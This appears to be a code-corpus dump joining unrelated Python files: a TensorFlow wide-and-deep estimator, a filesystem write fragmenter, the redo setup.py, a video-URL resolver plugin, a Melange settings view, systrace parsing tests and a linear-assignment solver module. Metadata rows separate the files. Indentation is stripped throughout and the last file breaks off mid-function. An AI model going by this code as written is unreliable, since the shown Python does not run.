self._linear_optimizer = linear_optimizer
self._dnn_feature_columns = dnn_feature_columns
self._dnn_hidden_units = dnn_hidden_units
self._centered_bias_weight_collection = "centered_bias"
self._enable_centered_bias = enable_centered_bias
self._target_column = target_column
self._feature_engineering_fn = (
feature_engineering_fn or
(lambda features, targets: (features, targets)))
@property
@deprecated("2016-10-30",
"This method will be removed after the deprecation date. "
"To inspect variables, use get_variable_names() and "
"get_variable_value().")
def linear_weights_(self):
"""Returns weights per feature of the linear part."""
return self._linear_model.get_weights(model_dir=self._model_dir)
@property
@deprecated("2016-10-30",
"This method will be removed after the deprecation date. "
"To inspect variables, use get_variable_names() and "
"get_variable_value().")
def linear_bias_(self):
"""Returns bias of the linear part."""
return (self._linear_model.get_bias(model_dir=self._model_dir) +
self.get_variable_value("centered_bias_weight"))
@property
@deprecated("2016-10-30",
"This method will be removed after the deprecation date. "
"To inspect variables, use get_variable_names() and "
"get_variable_value().")
def dnn_weights_(self):
"""Returns weights of deep neural network part."""
return self._dnn_model.get_weights(model_dir=self._model_dir)
@property
@deprecated("2016-10-30",
"This method will be removed after the deprecation date. "
"To inspect variables, use get_variable_names() and "
"get_variable_value().")
def dnn_bias_(self):
"""Returns bias of deep neural network part."""
return (self._dnn_model.get_bias(model_dir=self._model_dir) +
[self.get_variable_value("centered_bias_weight")])
def _get_target_column(self):
"""Returns the target column of this Estimator."""
return self._target_column
def _get_feature_dict(self, features):
if isinstance(features, dict):
return features
return {"": features}
def _get_train_ops(self, features, targets):
"""See base class."""
global_step = contrib_variables.get_global_step()
assert global_step
features = self._get_feature_dict(features)
features, targets = self._feature_engineering_fn(features, targets)
logits = self._logits(features, is_training=True)
if self._enable_centered_bias:
centered_bias_step = [self._centered_bias_step(targets, features)]
else:
centered_bias_step = []
with ops.control_dependencies(centered_bias_step):
training_loss = self._target_column.training_loss(logits, targets,
features)
weighted_average_loss = self._target_column.loss(logits, targets,
features)
logging_ops.scalar_summary("loss", weighted_average_loss)
linear_train_step = self._linear_model.get_train_step(training_loss)
dnn_train_step = (self._dnn_model.get_train_step(training_loss) if
self._dnn_model else [])
with ops.control_dependencies(linear_train_step + dnn_train_step):
with ops.get_default_graph().colocate_with(global_step):
return state_ops.assign_add(global_step, 1).op, weighted_average_loss
def _get_eval_ops(self, features, targets, metrics=None):
"""See base class."""
features = self._get_feature_dict(features)
features, targets = self._feature_engineering_fn(features, targets)
logits = self._logits(features)
return self._target_column.get_eval_ops(features, logits, targets, metrics)
def _get_predict_ops(self, features):
"""See base class."""
features = self._get_feature_dict(features)
features, _ = self._feature_engineering_fn(features, None)
logits = self._logits(features)
return self._target_column.logits_to_predictions(logits, proba=True)
@deprecated(
"2016-09-23",
"The signature of the input_fn accepted by export is changing to be "
"consistent with what's used by tf.Learn Estimator's train/evaluate, "
"which makes this function useless. This will be removed after the "
"deprecation date.")
def _get_feature_ops_from_example(self, examples_batch):
column_types = layers.create_feature_spec_for_parsing((
self._get_linear_feature_columns() or []) + (
self._get_dnn_feature_columns() or []))
features = parsing_ops.parse_example(examples_batch, column_types)
return features
def _get_linear_feature_columns(self):
if not self._linear_feature_columns:
return None
feature_column_ops.check_feature_columns(self._linear_feature_columns)
return sorted(set(self._linear_feature_columns), key=lambda x: x.key)
def _get_dnn_feature_columns(self):
if not self._dnn_feature_columns:
return None
feature_column_ops.check_feature_columns(self._dnn_feature_columns)
return sorted(set(self._dnn_feature_columns), key=lambda x: x.key)
def _dnn_logits(self, features, is_training):
return self._dnn_model.build_model(
features, self._dnn_feature_columns, is_training)
def _linear_logits(self, features, is_training):
return self._linear_model.build_model(
features, self._linear_feature_columns, is_training)
def _centered_bias(self):
centered_bias = variables.Variable(
array_ops.zeros([self._target_column.num_label_columns]),
collections=[self._centered_bias_weight_collection,
ops.GraphKeys.VARIABLES],
name="centered_bias_weight")
logging_ops.scalar_summary(
["centered_bias_%d" % cb for cb in range(
self._target_column.num_label_columns)],
array_ops.reshape(centered_bias, [-1]))
return centered_bias
def _centered_bias_step(self, targets, features):
centered_bias = ops.get_collection(self._centered_bias_weight_collection)
batch_size = array_ops.shape(targets)[0]
logits = array_ops.reshape(
array_ops.tile(centered_bias[0], [batch_size]),
[batch_size, self._target_column.num_label_columns])
with ops.name_scope(None, "centered_bias", (targets, features)):
training_loss = self._target_column.training_loss(
logits, targets, features)
    # Learn central bias by an optimizer. 0.1 is a conservative lr for a
# single variable.
return training.AdagradOptimizer(0.1).minimize(
training_loss, var_list=centered_bias)
def _logits(self, features, is_training=False):
linear_feature_columns = self._get_linear_feature_columns()
dnn_feature_columns = self._get_dnn_feature_columns()
if not (linear_feature_columns or dnn_feature_columns):
raise ValueError("Either linear_feature_columns or dnn_feature_columns "
"should be defined.")
if linear_feature_columns and dnn_feature_columns:
logits = (self._linear_logits(features, is_training) +
self._dnn_logits(features, is_training))
elif dnn_feature_columns:
logits = self._dnn_logits(features, is_training)
else:
logits = self._linear_logits(features, is_training)
if self._enable_centered_bias:
return nn.bias_add(logits, self._centered_bias())
else:
return logits
class DNNLinearCombinedClassifier(_DNNLinearCombinedBaseEstimator):
"""A classifier for TensorFlow Linear and DNN joined training models.
Example:
```python
education = sparse_column_with_hash_bucket(column_name="education",
hash_bucket_size=1000)
occupation = sparse_column_with_hash_bucket(column_name="occupation",
hash_bucket_size=1000)
education_x_occupation = crossed_column(columns=[education, occupation],
hash_bucket_size=10000)
education_emb = embedding_column(sparse_id_column=education, dimension=16,
combiner="sum")
occupation_emb = embedding_column(sparse_id_column=occupation, dimension=16,
combiner="sum")
estimator = DNNLinearCombinedClassifier(
# common settings
n_classes=n_classes,
weight_column_name=weight_column_name,
# wide settings
linear_feature_columns=[education_x_occupation],
linear_optimizer=tf.train.FtrlOptimizer(...),
# deep settings
dnn_feature_columns=[education_emb, occupation_emb],
dnn_hidden_units=[1000, 500, 100],
dnn_optimizer=tf.train.AdagradOptimizer(...))
# Input builders
def input_fn_train: # returns x, y
...
def input_fn_eval: # returns x, y
...
estimator.fit(input_fn=input_fn_train)
estimator.evaluate(input_fn=input_fn_eval)
estimator.predict(x=x)
```
Input of `fit` and `evaluate` should have following features,
otherwise there will be a `KeyError`:
if `weight_column_name` is not `None`, a feature with
`key=weight_column_name` whose value is a `Tensor`.
for each `column` in `dnn_feature_columns` + `linear_feature_columns`:
- if `column` is a `SparseColumn`, a feature with `key=column.name`
whose `value` is a `SparseTensor`.
- if `column` is a `WeightedSparseColumn`, two features: the first with
`key` the id column name, the second with `key` the weight column name.
Both features' `value` must be a `SparseTensor`.
- if `column` is a `RealValuedColumn, a feature with `key=column.name`
whose `value` is a `Tensor`.
"""
def __init__(self, # _joint_linear_weights pylint: disable=invalid-name
model_dir=None,
n_classes=2,
weight_column_name=None,
linear_feature_columns=None,
linear_optimizer=None,
_joint_linear_weights=False,
dnn_feature_columns=None,
dnn_optimizer=None,
dnn_hidden_units=None,
dnn_activation_fn=nn.relu,
dnn_dropout=None,
gradient_clip_norm=None,
enable_centered_bias=None,
config=None,
feature_engineering_fn=None):
"""Constructs a DNNLinearCombinedClassifier instance.
Args:
model_dir: Directory to save model parameters, graph and etc. This can
also be used to load checkpoints from the directory into a estimator
to continue training a previously saved model.
n_classes: number of target classes. Default is binary classification.
weight_column_name: A string defining feature column name representing
weights. It is used to down weight or boost examples during training.
It will be multiplied by the loss of the example.
linear_feature_columns: An iterable containing all the feature columns
used by linear part of the model. All items in the set must be
instances of classes derived from `FeatureColumn`.
linear_optimizer: An instance of `tf.Optimizer` used to apply gradients to
the linear part of the model. If `None`, will use a FTRL optimizer.
_joint_linear_weights: If True a single (possibly partitioned) variable
will be used to store the linear model weights. It's faster, but
requires all columns are sparse and have the 'sum' combiner.
dnn_feature_columns: An iterable containing all the feature columns used
by deep part of the model. All items in the set must be instances of
classes derived from `FeatureColumn`.
dnn_optimizer: An instance of `tf.Optimizer` used to apply gradients to
the deep part of the model. If `None`, will use an Adagrad optimizer.
dnn_hidden_units: List of hidden units per layer. All layers are fully
connected.
dnn_activation_fn: Activation function applied to each layer. If `None`,
will use `tf.nn.relu`.
dnn_dropout: When not None, the probability we will drop out
a given coordinate.
gradient_clip_norm: A float > 0. If provided, gradients are clipped
to their global norm with this clipping ratio. See
tf.clip_by_global_norm for more details.
enable_centered_bias: A bool. If True, estimator will learn a centered
bias variable for each class. Rest of the model structure learns the
residual after centered bias.
config: RunConfig object to configure the runtime settings.
feature_engineering_fn: Feature engineering function. Takes features and
targets which are the output of `input_fn` and
returns features and targets which will be fed
into the model.
Raises:
ValueError: If `n_classes` < 2.
ValueError: If both `linear_feature_columns` and `dnn_features_columns`
are empty at the same time.
"""
if n_classes < 2:
raise ValueError("n_classes should be greater than 1. Given: {}".format(
n_classes))
if enable_centered_bias is None:
enable_centered_bias = True
_changing_default_center_bias()
target_column = layers.multi_class_target(
n_classes=n_classes,
weight_column_name=weight_column_name)
super(DNNLinearCombinedClassifier, self).__init__(
model_dir=model_dir,
linear_feature_columns=linear_feature_columns,
linear_optimizer=linear_optimizer,
_joint_linear_weights=_joint_linear_weights,
dnn_feature_columns=dnn_feature_columns,
dnn_optimizer=dnn_optimizer,
dnn_hidden_units=dnn_hidden_units,
dnn_activation_fn=dnn_activation_fn,
dnn_dropout=dnn_dropout,
gradient_clip_norm=gradient_clip_norm,
enable_centered_bias=enable_centered_bias,
target_column=target_column,
config=config,
feature_engineering_fn=feature_engineering_fn)
@deprecated_arg_values(
estimator.AS_ITERABLE_DATE, estimator.AS_ITERABLE_INSTRUCTIONS,
as_iterable=False)
def predict(self, x=None, input_fn=None, batch_size=None, as_iterable=False):
"""Returns predicted classes for given features.
Args:
x: features.
input_fn: Input function. If set, x must be None.
batch_size: Override default batch size.
as_iterable: If True, return an iterable which keeps yielding predictions
for each example until inputs are exhausted. Note: The inputs must
terminate if you want the iterable to terminate (e.g. be sure to pass
num_epochs=1 if you are using something like read_batch_features).
Returns:
Numpy array of predicted classes (or an iterable of predicted classes if
as_iterable is True).
"""
predictions = self.predict_proba(
x=x, input_fn=input_fn, batch_size=batch_size, as_iterable=as_iterable)
if as_iterable:
return (np.argmax(p, axis=0) for p in predictions)
else:
return np.argmax(predictions, axis=1)
@deprecated_arg_values(
estimator.AS_ITERABLE_DATE, estimator.AS_ITERABLE_INSTRUCTIONS,
as_iterable=False)
def predict_proba(
self, x=None, input_fn=None, batch_size=None, as_iterable=False):
"""Returns prediction probabilities for given features.
Args:
x: features.
input_fn: Input function. If set, x and y must be None.
batch_size: Override default batch size.
as_iterable: If True, return an iterable which keeps yielding predictions
for each example until inputs are exhausted. Note: The inputs must
terminate if you want the iterable to terminate (e.g. be sure to pass
num_epochs=1 if you are using something like read_batch_features).
Returns:
Numpy array of predicted probabilities (or an iterable of predicted
probabilities if as_iterable is True).
"""
return super(DNNLinearCombinedClassifier, self).predict(
x=x, input_fn=input_fn, batch_size=batch_size, as_iterable=as_iterable)
class DNNLinearCombinedRegressor(_DNNLinearCombinedBaseEstimator):
"""A regressor for TensorFlow Linear and DNN joined training models.
Example:
```python
education = sparse_column_with_hash_bucket(column_name="education",
hash_bucket_size=1000)
occupation = sparse_column_with_hash_bucket(column_name="occupation",
hash_bucket_size=1000)
education_x_occupation = crossed_column(columns=[education, occupation],
hash_bucket_size=10000)
education_emb = embedding_column(sparse_id_column=education, dimension=16,
combiner="sum")
occupation_emb = embedding_column(sparse_id_column=occupation, dimension=16,
combiner="sum")
estimator = DNNLinearCombinedRegressor(
# common settings
weight_column_name=weight_column_name,
# wide settings
linear_feature_columns=[education_x_occupation],
linear_optimizer=tf.train.FtrlOptimizer(...),
# deep settings
dnn_feature_columns=[education_emb, occupation_emb],
dnn_hidden_units=[1000, 500, 100],
dnn_optimizer=tf.train.ProximalAdagradOptimizer(...))
# To apply L1 and L2 regularization, you can set optimizers as follows:
tf.train.ProximalAdagradOptimizer(
learning_rate=0.1,
l1_regularization_strength=0.001,
l2_regularization_strength=0.001)
  # It is the same for FtrlOptimizer.
# Input builders
def input_fn_train: # returns x, y
...
def input_fn_eval: # returns x, y
...
estimator.train(input_fn_train)
estimator.evaluate(input_fn_eval)
estimator.predict(x)
```
Input of `fit`, `train`, and `evaluate` should have following features,
otherwise there will be a `KeyError`:
if `weight_column_name` is not `None`, a feature with
`key=weight_column_name` whose value is a `Tensor`.
for each `column` in `dnn_feature_columns` + `linear_feature_columns`:
- if `column` is a `SparseColumn`, a feature with `key=column.name`
whose `value` is a `SparseTensor`.
- if `column` is a `WeightedSparseColumn`, two features: the first with
`key` the id column name, the second with `key` the weight column name.
Both features' `value` must be a `SparseTensor`.
- if `column` is a `RealValuedColumn, a feature with `key=column.name`
whose `value` is a `Tensor`.
"""
def __init__(self, # _joint_linear_weights pylint: disable=invalid-name
model_dir=None,
weight_column_name=None,
linear_feature_columns=None,
linear_optimizer=None,
_joint_linear_weights=False,
dnn_feature_columns=None,
dnn_optimizer=None,
dnn_hidden_units=None,
dnn_activation_fn=nn.relu,
dnn_dropout=None,
gradient_clip_norm=None,
enable_centered_bias=None,
target_dimension=1,
config=None,
feature_engineering_fn=None):
"""Initializes a DNNLinearCombinedRegressor instance.
Args:
model_dir: Directory to save model parameters, graph and etc. This can
also be used to load checkpoints from the directory into a estimator
to continue training a previously saved model.
weight_column_name: A string defining feature column name representing
weights. It is used to down weight or boost examples during training. It
will be multiplied by the loss of the example.
linear_feature_columns: An iterable containing all the feature columns
used by linear part of the model. All items in the set must be
instances of classes derived from `FeatureColumn`.
linear_optimizer: An instance of `tf.Optimizer` used to apply gradients to
the linear part of the model. If `None`, will use a FTRL optimizer.
_joint_linear_weights: If True a single (possibly partitioned) variable
will be used to store the linear model weights. It's faster, but
requires that all columns are sparse and have the 'sum' combiner.
dnn_feature_columns: An iterable containing all the feature columns used
by deep part of the model. All items in the set must be instances of
classes derived from `FeatureColumn`.
dnn_optimizer: An instance of `tf.Optimizer` used to apply gradients to
the deep part of the model. If `None`, will use an Adagrad optimizer.
dnn_hidden_units: List of hidden units per layer. All layers are fully
connected.
dnn_activation_fn: Activation function applied to each layer. If None,
will use `tf.nn.relu`.
dnn_dropout: When not None, the probability we will drop out
a given coordinate.
gradient_clip_norm: A float > 0. If provided, gradients are clipped
to their global norm with this clipping ratio. See
tf.clip_by_global_norm for more details.
enable_centered_bias: A bool. If True, estimator will learn a centered
bias variable for each class. Rest of the model structure learns the
residual after centered bias.
target_dimension: TODO(zakaria): dimension of the target for multilabels.
config: RunConfig object to configure the runtime settings.
feature_engineering_fn: Feature engineering function. Takes features and
targets which are the output of `input_fn` and
returns features and targets which will be fed
into the model.
Raises:
ValueError: If both linear_feature_columns and dnn_features_columns are
empty at the same time.
"""
if enable_centered_bias is None:
enable_centered_bias = True
_changing_default_center_bias()
target_column = layers.regression_target(
weight_column_name=weight_column_name,
target_dimension=target_dimension)
super(DNNLinearCombinedRegressor, self).__init__(
model_dir=model_dir,
linear_feature_columns=linear_feature_columns,
linear_optimizer=linear_optimizer,
_joint_linear_weights=_joint_linear_weights,
dnn_feature_columns=dnn_feature_columns,
dnn_optimizer=dnn_optimizer,
dnn_hidden_units=dnn_hidden_units,
dnn_activation_fn=dnn_activation_fn,
dnn_dropout=dnn_dropout,
gradient_clip_norm=gradient_clip_norm,
enable_centered_bias=enable_centered_bias,
target_column=target_column,
config=config,
feature_engineering_fn=feature_engineering_fn)
| apache-2.0 | -5,458,151,870,051,754,000 | 44.222054 | 82 | 0.665397 | false | 4.153878 | true | false | false |
tomato42/fsresck | fsresck/fragmenter.py | 1 | 1882 | # ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
#
# Description: File system resilience testing application
# Author: Hubert Kario <[email protected]>
#
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
#
# Copyright (c) 2015 Hubert Kario. All rights reserved.
#
# This copyrighted material is made available to anyone wishing
# to use, modify, copy, or redistribute it subject to the terms
# and conditions of the GNU General Public License version 2.
#
# This program is distributed in the hope that it will be
# useful, but WITHOUT ANY WARRANTY; without even the implied
# warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR
# PURPOSE. See the GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public
# License along with this program; if not, write to the Free
# Software Foundation, Inc., 51 Franklin Street, Fifth Floor,
# Boston, MA 02110-1301, USA.
#
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
"""Methods to fragment list of writes."""
from .write import Write
class Fragmenter(object):
"""Object for fragmenting a list of writes further."""
def __init__(self, sector_size=512):
"""
Create an object.
@param sector_size: maximum size of the generated fragments
"""
self.sector_size = sector_size
def fragment(self, writes):
"""
Return a generator with fragmented Write objects from passed writes.
@param writes: list of Write objects
"""
for write in writes:
data = write.data
offset = write.offset
while data:
ret = Write(offset, data[:self.sector_size])
offset += len(ret.data)
data = data[self.sector_size:]
yield ret
| gpl-2.0 | 6,986,712,135,830,994,000 | 32.607143 | 76 | 0.575983 | false | 4.524038 | false | false | false |
apenwarr/redo | setup.py | 1 | 2105 | import os, setuptools, subprocess
# Construct the redo input files, including redo.version, if we're
# starting from the original redo source dir. If we're running
# from the python pip package, the files already exist, so we
# skip this step.
mydir = os.path.dirname(__file__)
script = os.path.join(mydir, 'do')
verfile = os.path.join(mydir, 'redo/version/_version.py')
if os.path.exists(script) and not os.path.exists(verfile):
subprocess.check_call([script])
import redo.version
def read(fname):
return open(os.path.join(mydir, fname)).read()
# FIXME: we probably need to build redo/sh on the target system, somehow.
setuptools.setup(
name = 'redo-tools',
version = redo.version.TAG.replace('-', '+', 1),
python_requires='>=2.7',
author = 'Avery Pennarun',
author_email = '[email protected]',
description = ('djb redo: a recursive, general purpose build system.'),
long_description=read('README.md'),
long_description_content_type='text/markdown',
license = 'Apache',
keywords = 'redo redo-ifchange make dependencies build system compiler',
url = 'https://github.com/apenwarr/redo',
packages = setuptools.find_packages(),
classifiers = [
'Development Status :: 4 - Beta',
'Environment :: Console',
'Topic :: Utilities',
'License :: OSI Approved :: Apache Software License',
'Operating System :: POSIX',
'Topic :: Software Development :: Build Tools',
'Topic :: Utilities',
],
entry_points = {
'console_scripts': [
'redo=redo.cmd_redo:main',
'redo-always=redo.cmd_always:main',
'redo-ifchange=redo.cmd_ifchange:main',
'redo-ifcreate=redo.cmd_ifcreate:main',
'redo-log=redo.cmd_log:main',
'redo-ood=redo.cmd_ood:main',
'redo-sources=redo.cmd_sources:main',
'redo-stamp=redo.cmd_stamp:main',
'redo-targets=redo.cmd_targets:main',
'redo-unlocked=redo.cmd_unlocked:main',
'redo-whichdo=redo.cmd_whichdo:main',
],
},
)
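# After installation (e.g. `pip install .`) each entry point above becomes a
# console command on PATH; `redo-ifchange <target>` is the one most build
# scripts call.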
| apache-2.0 | -2,273,679,286,823,372,000 | 34.677966 | 76 | 0.628029 | false | 3.579932 | false | false | false |
repotvsupertuga/tvsupertuga.repository | instal/script.module.resolveurl/lib/resolveurl/plugins/indavideo.py | 3 | 2726 | # -*- coding: UTF-8 -*-
"""
Kodi resolveurl plugin
Copyright (C) 2016 alifrezser
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
"""
import json
import re
from lib import helpers
from resolveurl import common
from resolveurl.resolver import ResolveUrl, ResolverError
class IndavideoResolver(ResolveUrl):
name = "indavideo"
domains = ["indavideo.hu"]
pattern = '(?://|\.)(indavideo\.hu)/(?:player/video|video)/([0-9A-Za-z-_]+)'
def __init__(self):
self.net = common.Net()
def get_media_url(self, host, media_id):
web_url = self.get_url(host, media_id)
headers = {'User-Agent': common.FF_USER_AGENT}
html = self.net.http_GET(web_url, headers=headers).content
data = json.loads(html)
if data['success'] == '0':
html = self.net.http_GET('http://indavideo.hu/video/%s' % media_id).content
hash = re.search('emb_hash.+?value\s*=\s*"([^"]+)', html)
if not hash:
raise ResolverError('File not found')
web_url = self.get_url(host, hash.group(1))
html = self.net.http_GET(web_url).content
data = json.loads(html)
if data['success'] == '1':
video_files = data['data']['video_files']
if not video_files:
raise ResolverError('File removed')
tokens = data['data']['filesh']
sources = []
if isinstance(video_files, dict): video_files = video_files.values()
for i in video_files:
match = re.search('\.(\d+)\.mp4', i)
if match: sources.append((match.group(1), i))
sources = [(i[0], i[1] + '&token=%s' % tokens[i[0]]) for i in sources]
try: sources = list(set(sources))
except: pass
sources = sorted(sources, key=lambda x: x[0])[::-1]
return helpers.pick_source(sources)
raise ResolverError('File not found')
def get_url(self, host, media_id):
return 'http://amfphp.indavideo.hu/SYm0json.php/player.playerHandler.getVideoData/%s' % (media_id)
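# Illustrative note (not in the original plugin): ``pattern`` above is what the
# ResolveURL framework matches against incoming links; for a hypothetical URL
# http://indavideo.hu/video/abc123 the two capture groups are
# ('indavideo.hu', 'abc123'), which are then passed to get_media_url() as
# (host, media_id).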
| gpl-2.0 | 5,358,056,482,370,218,000 | 37.942857 | 106 | 0.604182 | false | 3.786111 | false | false | false |
rhyolight/nupic.son | app/melange/views/settings.py | 1 | 2584 | # Copyright 2013 the Melange authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Module with user settings related views."""
from django import forms
from django import http
from melange.logic import settings as settings_logic
from melange.request import access
from melange.views.helper import urls
from soc.logic import cleaning
from soc.views import base
from soc.views.helper import url_patterns
class UserSettingsForm(forms.Form):
"""Form to set user settings for the page."""
view_as = forms.CharField()
def clean_view_as(self):
"""Cleans view_as field."""
user = cleaning.clean_existing_user('view_as')(self)
return user.key if user else None
class UserSettings(base.RequestHandler):
"""View to list and set all user settings for the page."""
access_checker = access.DEVELOPER_ACCESS_CHECKER
def djangoURLPatterns(self):
"""See base.RequestHandler.djangoURLPatterns for specification."""
return [
url_patterns.url(
r'site', r'settings/user/%s$' % url_patterns.USER,
self, name=urls.UrlNames.USER_SETTINGS)
]
def templatePath(self):
"""See base.RequestHandler.templatePath for specification."""
return 'melange/settings/user_settings.html'
def context(self, data, check, mutator):
"""See base.RequestHandler.context for specification."""
user_settings = settings_logic.getUserSettings(data.url_ndb_user.key)
initial = {}
if user_settings.view_as is not None:
initial['view_as'] = user_settings.view_as.id()
return {'form': UserSettingsForm(data=data.POST or None, initial=initial)}
def post(self, data, check, mutator):
"""See base.RequestHandler.post for specification."""
form = UserSettingsForm(data=data.POST)
if form.is_valid():
view_as = form.cleaned_data['view_as'] or None
settings_logic.setUserSettings(data.url_ndb_user.key, view_as=view_as)
return http.HttpResponseRedirect(data.request.get_full_path())
else:
# TODO(nathaniel): problematic self-use.
return self.get(data, check, mutator)
| apache-2.0 | 621,038,370,779,500,400 | 31.708861 | 78 | 0.718266 | false | 3.772263 | false | false | false |
joelagnel/trappy | tests/test_systrace.py | 1 | 3330 | # Copyright 2016-2017 ARM Limited
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import utils_tests
import trappy
class TestSystrace(utils_tests.SetupDirectory):
def __init__(self, *args, **kwargs):
super(TestSystrace, self).__init__(
[("trace_systrace.html", "trace.html")],
*args,
**kwargs)
def test_systrace_html(self):
"""Tests parsing of a systrace embedded textual trace """
events = ["sched_switch", "sched_wakeup", "trace_event_clock_sync"]
trace = trappy.SysTrace("trace.html", events=events)
self.assertTrue(hasattr(trace, "sched_switch"))
self.assertEquals(len(trace.sched_switch.data_frame), 4)
self.assertTrue("prev_comm" in trace.sched_switch.data_frame.columns)
self.assertTrue(hasattr(trace, "sched_wakeup"))
self.assertEquals(len(trace.sched_wakeup.data_frame), 4)
self.assertTrue("target_cpu" in trace.sched_wakeup.data_frame.columns)
self.assertTrue(hasattr(trace, "trace_event_clock_sync"))
self.assertEquals(len(trace.trace_event_clock_sync.data_frame), 1)
self.assertTrue("realtime_ts" in trace.trace_event_clock_sync.data_frame.columns)
def test_cpu_counting(self):
"""SysTrace traces know the number of cpus"""
trace = trappy.SysTrace("trace.html")
self.assertTrue(hasattr(trace, "_cpus"))
self.assertEquals(trace._cpus, 3)
class TestLegacySystrace(utils_tests.SetupDirectory):
def __init__(self, *args, **kwargs):
super(TestLegacySystrace, self).__init__(
[("trace_legacy_systrace.html", "trace.html")],
*args,
**kwargs)
def test_systrace_html(self):
"""Tests parsing of a legacy systrace embedded textual trace """
events = ["sched_switch", "sched_wakeup", "sched_contrib_scale_f"]
trace = trappy.SysTrace("trace.html", events=events)
self.assertTrue(hasattr(trace, "sched_switch"))
self.assertEquals(len(trace.sched_switch.data_frame), 3)
self.assertTrue("prev_comm" in trace.sched_switch.data_frame.columns)
self.assertTrue(hasattr(trace, "sched_wakeup"))
self.assertEquals(len(trace.sched_wakeup.data_frame), 2)
self.assertTrue("target_cpu" in trace.sched_wakeup.data_frame.columns)
self.assertTrue(hasattr(trace, "sched_contrib_scale_f"))
self.assertEquals(len(trace.sched_contrib_scale_f.data_frame), 2)
self.assertTrue("freq_scale_factor" in trace.sched_contrib_scale_f.data_frame.columns)
def test_cpu_counting(self):
"""In a legacy SysTrace trace, trappy gets the number of cpus"""
trace = trappy.SysTrace("trace.html")
self.assertTrue(hasattr(trace, "_cpus"))
self.assertEquals(trace._cpus, 8)
| apache-2.0 | 2,596,708,892,532,037,000 | 37.275862 | 94 | 0.667267 | false | 3.737374 | true | false | false |
e2crawfo/dps | motmetrics/lap.py | 1 | 6069 | import numpy as np
from collections import OrderedDict
def linear_sum_assignment(costs, solver=None):
"""Solve a linear sum assignment problem (LSA).
For large datasets solving the minimum cost assignment becomes the dominant runtime part.
We therefore support various solvers out of the box (currently lapsolver, scipy, ortools, munkres)
Params
------
costs : np.array
numpy matrix containing costs. Use NaN/Inf values for unassignable
row/column pairs.
Kwargs
------
solver : callable or str, optional
When str: name of solver to use.
When callable: function to invoke
When None: uses first available solver
"""
solver = solver or default_solver
if isinstance(solver, str):
# Try resolve from string
solver = solver_map.get(solver, None)
assert callable(solver), 'Invalid LAP solver.'
return solver(costs)
def lsa_solve_scipy(costs):
"""Solves the LSA problem using the scipy library."""
from scipy.optimize import linear_sum_assignment as scipy_solve
# Note there is an issue in scipy.optimize.linear_sum_assignment where
# it runs forever if an entire row/column is infinite or nan. We therefore
# make a copy of the distance matrix and compute a safe value that indicates
# 'cannot assign'. Also note + 1 is necessary in below inv-dist computation
# to make invdist bigger than max dist in case max dist is zero.
inv = ~np.isfinite(costs)
if inv.any():
costs = costs.copy()
valid = costs[~inv]
INVDIST = 2 * valid.max() + 1 if valid.shape[0] > 0 else 1.
costs[inv] = INVDIST
return scipy_solve(costs)
def lsa_solve_lapsolver(costs):
"""Solves the LSA problem using the lapsolver library."""
from lapsolver import solve_dense
return solve_dense(costs)
def lsa_solve_munkres(costs):
"""Solves the LSA problem using the Munkres library."""
from munkres import Munkres, DISALLOWED
m = Munkres()
costs = costs.copy()
inv = ~np.isfinite(costs)
if inv.any():
costs = costs.astype(object)
costs[inv] = DISALLOWED
indices = np.array(m.compute(costs), dtype=np.int64)
return indices[:,0], indices[:,1]
def lsa_solve_ortools(costs):
"""Solves the LSA problem using Google's optimization tools."""
from ortools.graph import pywrapgraph
# Google OR tools only support integer costs. Here's our attempt
# to convert from floating point to integer:
#
# We search for the minimum difference between any two costs and
# compute the first non-zero digit after the decimal place. Then
# we compute a factor,f, that scales all costs so that the difference
# is integer representable in the first digit.
#
# Example: min-diff is 0.001, then first non-zero digit place -3, so
# we scale by 1e3.
#
    # For small min-diffs and large costs in general there is a chance of
    # overflowing.
valid = np.isfinite(costs)
min_e = -8
unique = np.unique(costs[valid])
if unique.shape[0] == 1:
min_diff = unique[0]
elif unique.shape[0] > 1:
min_diff = np.diff(unique).min()
else:
min_diff = 1
min_diff_e = 0
if min_diff != 0.0:
min_diff_e = int(np.log10(np.abs(min_diff)))
if min_diff_e < 0:
min_diff_e -= 1
e = min(max(min_e, min_diff_e), 0)
f = 10**abs(e)
assignment = pywrapgraph.LinearSumAssignment()
for r in range(costs.shape[0]):
for c in range(costs.shape[1]):
if valid[r,c]:
assignment.AddArcWithCost(r, c, int(costs[r,c]*f))
if assignment.Solve() != assignment.OPTIMAL:
return linear_sum_assignment(costs, solver='scipy')
if assignment.NumNodes() == 0:
return np.array([], dtype=np.int64), np.array([], dtype=np.int64)
pairings = []
for i in range(assignment.NumNodes()):
pairings.append([i, assignment.RightMate(i)])
indices = np.array(pairings, dtype=np.int64)
return indices[:,0], indices[:,1]
def lsa_solve_lapjv(costs):
from lap import lapjv
inv = ~np.isfinite(costs)
if inv.any():
costs = costs.copy()
valid = costs[~inv]
INVDIST = 2 * valid.max() + 1 if valid.shape[0] > 0 else 1.
costs[inv] = INVDIST
r = lapjv(costs, return_cost=False, extend_cost=True)
